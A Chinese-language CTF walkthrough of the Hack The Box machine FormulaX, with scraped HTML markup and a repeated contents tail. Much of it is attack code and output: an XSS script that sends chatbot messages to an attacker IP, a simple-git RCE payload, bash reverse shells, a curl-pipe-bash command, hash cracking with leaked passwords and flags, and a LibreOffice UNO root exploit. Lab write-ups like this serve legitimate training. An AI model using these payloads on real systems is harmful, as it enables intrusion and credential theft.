FormulaX 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>

使用Nmap进行快速扫描：<\/p>

nmap -sC -sV 10.10.11.6 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>添加目标主机到hosts文件：<\/p>
echo '10.10.11.6 formula.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>1.2 发现的服务<\/h3>

发现域名：formula.htb<\/li>
后续发现子域名：dev-git-auto-update.chatbot.htb<\/li>
<\/ul>
2. Web应用渗透<\/h2>
2.1 用户注册与登录<\/h3>

创建一个新用户并登录<\/li>
发现聊天窗口功能，但普通用户无法使用<\/li>
<\/ul>
2.2 XSS漏洞利用<\/h3>

在联系页面测试跨站脚本(XSS)漏洞<\/li>
发现服务器开启了跨域资源访问(CORS)<\/li>
无法获取cookie(设置了HttpOnly标志)<\/li>
通过XSS获取Chatbot发送消息的源码<\/li>
<\/ol>
2.3 CSRF攻击<\/h3>
编写恶意脚本(s-h4ck13.js)：<\/p>
const<\/span> script<\/span> =<\/span> document.createElement<\/span>('script'<\/span>);
<\/span><\/span>script<\/span>.src<\/span> =<\/span> '\/socket.io\/socket.io.js'<\/span>;
<\/span><\/span>document.head<\/span>.appendChild<\/span>(script<\/span>);
<\/span><\/span>
<\/span><\/span>script<\/span>.addEventListener<\/span>('load'<\/span>, function<\/span>() {
<\/span><\/span>    const<\/span> res<\/span> =<\/span> axios<\/span>.get<\/span>(`\/user\/api\/chat`<\/span>);
<\/span><\/span>    const<\/span> socket<\/span> =<\/span> io<\/span>('\/'<\/span>,{withCredentials<\/span>:<\/span> true<\/span>});
<\/span><\/span>    
<\/span><\/span>    socket<\/span>.on<\/span>('message'<\/span>, (my_message<\/span>) => {
<\/span><\/span>        fetch<\/span>("http:\/\/10.10.16.6\/?data="<\/span> +<\/span> my_message<\/span>)
<\/span><\/span>    });
<\/span><\/span>    
<\/span><\/span>    socket<\/span>.emit<\/span>('client_message'<\/span>, 'history'<\/span>);
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>通过此脚本：<\/p>

利用WebSocket与Chatbot交互<\/li>
获取Chatbot的历史记录<\/li>
发现新子域名：dev-git-auto-update.chatbot.htb<\/li>
<\/ol>
3. Git自动化系统漏洞利用<\/h2>
3.1 发现Simple-git漏洞<\/h3>

搜索发现Simple-git在3.15之前存在RCE漏洞(CVE-2022-25912)<\/li>
漏洞利用代码：<\/li>
<\/ul>
const<\/span> simpleGit<\/span> =<\/span> require<\/span>('simple-git'<\/span>)
<\/span><\/span>const<\/span> git2<\/span> =<\/span> simpleGit<\/span>()
<\/span><\/span>git2<\/span>.clone<\/span>('ext::sh -c touch% \/tmp\/pwn% >&2'<\/span>, '\/tmp\/example-new-repo'<\/span>, ["-c"<\/span>, "protocol.ext.allow=always"<\/span>]);
<\/span><\/span><\/code><\/pre>3.2 反向Shell获取<\/h3>
准备reverse.sh：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>bash -i >& \/dev\/tcp\/10.10.16.6\/10032 0>&1<\/span>
<\/span><\/span><\/code><\/pre>在"Remote Git Url"栏中输入payload：<\/p>
ext::sh -c curl% http:\/\/10.10.16.6\/reverse.sh|bash
<\/code><\/pre>
4. 内网横向移动<\/h2>
4.1 数据库枚举<\/h3>
发现开放服务：<\/p>

MariaDB (3306)<\/li>
MongoDB (27017)<\/li>
<\/ul>
查找数据库配置文件：<\/p>
find .\/ -type f -name '*db*'<\/span> | while<\/span> read -r file; do<\/span>
<\/span><\/span>    filename=<\/span>$(<\/span>basename "<\/span>$file"<\/span>)<\/span>
<\/span><\/span>    if<\/span> [<\/span> ${#<\/span>filename}<\/span> -le 15<\/span> ]<\/span>; then<\/span>
<\/span><\/span>        echo "<\/span>$file"<\/span>
<\/span><\/span>    fi<\/span>
<\/span><\/span>done<\/span>
<\/span><\/span><\/code><\/pre>访问MongoDB：<\/p>
><\/span> use<\/span> testing<\/span>
<\/span><\/span>><\/span> show<\/span> collections<\/span>
<\/span><\/span>><\/span> db<\/span>.users<\/span>.find<\/span>()
<\/span><\/span><\/code><\/pre>发现用户frank_dorky的凭据：<\/p>

用户名：frank_dorky<\/li>
密码哈希：\(2b\)<\/span>10$hrB\/by.tb\/4ABJbbt1l4\/ep\/L4CTY6391eSETamjLp7s.elpsB4J6<\/li>
<\/ul>
4.2 密码破解<\/h3>
使用hashcat破解：<\/p>
echo "\$2b\$10\$hrB\/by.tb\/4ABJbbt1l4\/ep\/L4CTY6391eSETamjLp7s.elpsB4J6"<\/span> > hash
<\/span><\/span>hashcat -m 3200<\/span> hash \/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>破解结果：<\/p>

密码：manchesterunited<\/li>
<\/ul>
获取用户flag：<\/p>
cat \/home\/frank_dorky\/user.txt
<\/span><\/span># e079c692881778c3880454b025b906b0<\/span>
<\/span><\/span><\/code><\/pre>5. 权限提升<\/h2>
5.1 发现LibreNMS服务<\/h3>

发现3000端口运行LibreNMS(网络监控系统)<\/li>
版本：22.10.0<\/li>
<\/ul>
通过SSH隧道访问：<\/p>
ssh -L 3000:127.0.0.1:3000 frank_dorky@10.10.11.6
<\/span><\/span><\/code><\/pre>5.2 获取数据库配置<\/h3>
使用\/opt\/librenms\/config_to_json.php获取数据库配置：<\/p>
.\/validate.php
<\/span><\/span><\/code><\/pre>发现新用户：<\/p>

用户名：kai_relay<\/li>
密码：mychemicalformulaX<\/li>
<\/ul>
5.3 利用LibreOffice漏洞<\/h3>

检查sudo权限：<\/li>
<\/ol>
sudo -l
<\/span><\/span><\/code><\/pre>
发现可执行\/usr\/bin\/office.sh：<\/li>
<\/ol>
cat \/usr\/bin\/office.sh
<\/span><\/span><\/code><\/pre>
准备反向Shell脚本(reverse.sh)：<\/li>
<\/ol>
bash -i >& \/dev\/tcp\/10.10.16.6\/10034 0>&1<\/span>
<\/span><\/span><\/code><\/pre>
准备利用脚本(exp.py)：<\/li>
<\/ol>
#!\/usr\/bin\/env python3<\/span>
<\/span><\/span>import<\/span> uno
<\/span><\/span>from<\/span> com.sun.star.system import<\/span> XSystemShellExecute
<\/span><\/span>
<\/span><\/span>local =<\/span> uno.<\/span>getComponentContext()
<\/span><\/span>resolver =<\/span> local.<\/span>ServiceManager.<\/span>createInstanceWithContext("com.sun.star.bridge.UnoUrlResolver"<\/span>, local)
<\/span><\/span>context =<\/span> resolver.<\/span>resolve("uno:socket,host=localhost,port=2002;urp;StarOffice.ComponentContext"<\/span>)
<\/span><\/span>rc =<\/span> context.<\/span>ServiceManager.<\/span>createInstance("com.sun.star.system.SystemShellExecute"<\/span>)
<\/span><\/span>rc.<\/span>execute("bash"<\/span>, "\/tmp\/reverse.sh"<\/span>, 1<\/span>)
<\/span><\/span><\/code><\/pre>
执行攻击：<\/li>
<\/ol>
sudo \/usr\/bin\/office.sh
<\/span><\/span># 在另一个终端<\/span>
<\/span><\/span>python3 exp.py
<\/span><\/span><\/code><\/pre>获取root flag：<\/p>
838cf791e70b35799984bae602e49f0e
<\/code><\/pre>
6. 其他发现<\/h2>
在\/opt\/librenms中存在添加用户的PHP脚本：<\/p>
.\/addUser.php username password
<\/span><\/span><\/code><\/pre>可用于添加用户并获取3000端口web服务的shell，但在本实验中非必要。<\/p>

FormulaX 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. Web应用渗透<\/h2>

3. Git自动化系统漏洞利用<\/h2>

4. 内网横向移动<\/h2>

5. 权限提升<\/h2>

6. 其他发现<\/h2> 在\/opt\/librenms中存在添加用户的PHP脚本：<\/p> .\/addUser.php username password <\/span><\/span><\/code><\/pre>可用于添加用户并获取3000端口web服务的shell，但在本实验中非必要。<\/p>

6. 其他发现<\/h2>
在\/opt\/librenms中存在添加用户的PHP脚本：<\/p>
`.\/addUser.php username password <\/span><\/span><\/code><\/pre>可用于添加用户并获取3000端口web服务的shell，但在本实验中非必要。<\/p>`